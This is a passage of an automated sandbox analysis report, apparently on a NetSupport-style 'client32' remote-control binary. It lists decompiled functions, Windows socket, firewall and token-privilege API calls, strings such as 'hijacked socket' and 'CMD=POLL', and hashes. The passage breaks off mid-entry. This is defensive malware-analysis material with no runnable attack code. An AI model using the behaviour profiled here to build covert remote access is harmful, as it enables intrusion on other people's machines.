1452->1460 1453->1460 1462 6859ad80-6859ad86 1454->1462 1455->1461 1471 6859ac88-6859ac8d 1460->1471 1468 6859ad88-6859ad90 1462->1468 1469 6859ad97-6859ae0f InitializeCriticalSection call 68598fb0 call 685b0ef0 1462->1469 1468->1462 1473 6859ad92 1468->1473 1486 6859ae18-6859ae4b getsockname 1469->1486 1487 6859ae11 1469->1487 1476 6859ac8f-6859acc5 WSAGetLastError WSAUnhookBlockingHook closesocket call 685930a0 call 685b28e1 1471->1476 1477 6859acc6-6859accd 1471->1477 1473->1455 1480 6859accf-6859acd6 1477->1480 1481 6859ad45 WSAUnhookBlockingHook 1477->1481 1480->1481 1484 6859acd8-6859acfb call 6859a5c0 1480->1484 1481->1451 1484->1481 1492 6859acfd-6859ad2c WSAGetLastError WSAUnhookBlockingHook closesocket call 685930a0 1484->1492 1486->1455 1487->1486 1492->1461 1495 6859ad32-6859ad44 call 685b28e1 1492->1495
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 68595840: inet_ntoa.WSOCK32(00000080,?,00000000,?,68598F91,00000000,00000000,685DB8DA,?,00000080), ref: 68595852
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(685DB898,?,00000000,00000000), ref: 6859AA11
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AA58
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AA68
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AA94
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6859AB0B
                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6859AB4E
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6859AB5A
                                                                                                                                                                                                    • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AB8E
                                                                                                                                                                                                    • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6859ABB1
                                                                                                                                                                                                    • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6859ABE3
                                                                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC18
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC21
                                                                                                                                                                                                    • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC29
                                                                                                                                                                                                    • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC65
                                                                                                                                                                                                    • WSASetBlockingHook.WSOCK32(685963A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC76
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC8F
                                                                                                                                                                                                    • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC96
                                                                                                                                                                                                    • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC9C
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859ACFD
                                                                                                                                                                                                    • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD04
                                                                                                                                                                                                    • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD0A
                                                                                                                                                                                                    • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD45
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(685DB898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD4F
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(-685DCB4A), ref: 6859ADE6
                                                                                                                                                                                                      • Part of subcall function 68598FB0: _memset.LIBCMT ref: 68598FE4
                                                                                                                                                                                                      • Part of subcall function 68598FB0: getsockname.WSOCK32(?,?,00000010,?,02D42E90,?), ref: 68599005
                                                                                                                                                                                                    • getsockname.WSOCK32(00000000,?,?), ref: 6859AE4B
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AE60
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6859AE6C
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 6859AE7A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Cannot connect to gateway %s, error %d, xrefs: 6859ACA6
                                                                                                                                                                                                    • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6859AD14
                                                                                                                                                                                                    • *TcpNoDelay, xrefs: 6859ABB8
                                                                                                                                                                                                    • Connect error to %s using hijacked socket, error %d, xrefs: 6859AB17
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                                                                                                                                    • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                                                                                                                                    • API String ID: 692187944-2561115898
                                                                                                                                                                                                    • Opcode ID: e5e2543116c1c178c8091a40c7a64bb7115ccdae992da7a805c5cec0014acb38
                                                                                                                                                                                                    • Instruction ID: 19e6a8f323f29c85e24850b2e4ca5934d0a94c2982567c8896835727aa1d9333
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5e2543116c1c178c8091a40c7a64bb7115ccdae992da7a805c5cec0014acb38
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5E19375A402149FDF11DF68D890BEDB3B5EF88315F8041AAED19A7280DB709E84CFA5
                                                                                                                                                                                                    Function 685991F0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 97sleepnetworkCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • #16.WSOCK32(00000000,?,a3Zh,00000000,00000000,?,00000007), ref: 6859924C
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,?,a3Zh,00000000,00000000,?,00000007), ref: 6859925B
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 68599274
                                                                                                                                                                                                    • Sleep.KERNEL32(00000001,00000000,?,a3Zh,00000000,00000000,?,00000007), ref: 685992A8
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 685992B0
                                                                                                                                                                                                    • Sleep.KERNEL32(00000014), ref: 685992BC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ReadSocket - Connection has been closed by peer, xrefs: 685992E0
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 68599226
                                                                                                                                                                                                    • a3Zh, xrefs: 68599244
                                                                                                                                                                                                    • ReadSocket - Error %d reading response, xrefs: 685992F7
                                                                                                                                                                                                    • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6859922B
                                                                                                                                                                                                    • ReadSocket - Would block, xrefs: 6859928A
                                                                                                                                                                                                    • *RecvTimeout, xrefs: 6859927B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountSleepTick$ErrorLast
                                                                                                                                                                                                    • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$a3Zh$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                                                                                                                                    • API String ID: 2495545493-1096684884
                                                                                                                                                                                                    • Opcode ID: b5925360083a57d19c58249876366d12ba0b5fca48a5ea9abd192e68da549f5a
                                                                                                                                                                                                    • Instruction ID: edc879204cff4bdf9013b3b646520309aa2927875271b2d62d72d76eb8c5f498
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5925360083a57d19c58249876366d12ba0b5fca48a5ea9abd192e68da549f5a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2031A23AE80248EFDF10DFBCE988B9EB7F4EB85315F8044A9E908D7140E73199508B91
                                                                                                                                                                                                    Function 685A3130 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,?,?,97A2354D,25DC70BF,97A234B3,FFFFFFFF,00000000), ref: 685A31E2
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,685CECB0), ref: 685A31EC
                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,25DC70BF,97A234B3,FFFFFFFF,00000000), ref: 685A322A
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,685CECB0), ref: 685A3234
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(685DB898,?,97A2354D), ref: 685A32BE
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 685A32D3
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 685A334D
                                                                                                                                                                                                      • Part of subcall function 685ABA20: __strdup.LIBCMT ref: 685ABA3A
                                                                                                                                                                                                      • Part of subcall function 685ABB00: _free.LIBCMT ref: 685ABB2D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                                                                                                                                    • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                                                                                                                                    • API String ID: 1510130979-3441452530
                                                                                                                                                                                                    • Opcode ID: 45c4023052b712fd4c58dc05647e5a7416511ec50250fa07931a60422d5bb665
                                                                                                                                                                                                    • Instruction ID: 49227012a016f7c2ab4a82d9b13a2c96863fc9b37b58f8714e9526c00b33a5b1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45c4023052b712fd4c58dc05647e5a7416511ec50250fa07931a60422d5bb665
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4614176904208EFCF14DFA4D884EEEB7B9FF49314F84451EE816A7240EB34A944CBA5
                                                                                                                                                                                                    Function 11095C90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 11095CA4
                                                                                                                                                                                                    • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
                                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
                                                                                                                                                                                                    • CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                                                                                                                    • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                                                                                                                    • API String ID: 3222248624-258972079
                                                                                                                                                                                                    • Opcode ID: a191ec028fc1ebe43799a3fbc6b5824768ffae445ee9dba88daea3a8dfe179cf
                                                                                                                                                                                                    • Instruction ID: 667ad4978e11a958ff0dee1adaae51f217c5ac115a2c6bb433f56a1af31716a4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a191ec028fc1ebe43799a3fbc6b5824768ffae445ee9dba88daea3a8dfe179cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E011C2B0F0112D5FDB01DBE68C94AAFFB69AF04704F108569EA09D7244E722EE40C7E2
                                                                                                                                                                                                    Function 11072460 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _memset
                                                                                                                                                                                                    • String ID: NBCTL32.DLL$_License$serial_no
                                                                                                                                                                                                    • API String ID: 2102423945-35127696
                                                                                                                                                                                                    • Opcode ID: 73eab7b1c8d7b6e70f1aa5dd4ab6e6844c03489425f04d6019e1d2487717588b
                                                                                                                                                                                                    • Instruction ID: d0e0b9ecbde65a2366102896099e84d523940e720fd040d90542ba2888ebc4af
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73eab7b1c8d7b6e70f1aa5dd4ab6e6844c03489425f04d6019e1d2487717588b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CAB1A075E00219AFEB04CF98DC91FAEB7F5FF88304F148169E9599B295DB70A901CB90
                                                                                                                                                                                                    Function 11030B10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(1102DF30,?,00000000), ref: 11030B34
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                    • String ID: Client32$NSMWClass$NSMWClass
                                                                                                                                                                                                    • API String ID: 3192549508-611217420
                                                                                                                                                                                                    • Opcode ID: 58515847b78de4ae681c1499d6e223a9096c2b5aadf525ec481539d2362be3c4
                                                                                                                                                                                                    • Instruction ID: 7da52f349ca3cb7d8c11f8ab613c71e219a3e37bd0be996a8dda4c31b38bef83
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58515847b78de4ae681c1499d6e223a9096c2b5aadf525ec481539d2362be3c4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9901D674E0132EDFD346DFE4C8859AAFBB5EB8571CB148479D82887308FA71A904CB91
                                                                                                                                                                                                    Function 1109DC20 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,74DEF550,?,00000000), ref: 1109DC58
                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,007AF420,007AF420,007AF420,007AF420,007AF420,007AF420,007AF420,111EAB1C,?,00000001,00000001), ref: 1109DCA0
                                                                                                                                                                                                    • EqualSid.ADVAPI32(?,007AF420,?,00000001,00000001), ref: 1109DCB3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InformationToken$AllocateEqualInitialize
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1878589025-0
                                                                                                                                                                                                    • Opcode ID: e1ef01c0b2a593c632c16c9fc194400e1d79a88dd1ec3329169a1e99986687c3
                                                                                                                                                                                                    • Instruction ID: 4e420e32a86b216a8c4820a584475d55105e440134d2483d273bcb85c3c049ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1ef01c0b2a593c632c16c9fc194400e1d79a88dd1ec3329169a1e99986687c3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1214F71B4122EAFEB00DBA5DC91FBFF7B9EF44744F004069E915D7280E6B1A9018791
                                                                                                                                                                                                    Function 1109C750 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,24DE4E77,00080000,00000000,00000000), ref: 1109C77D
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
                                                                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
                                                                                                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
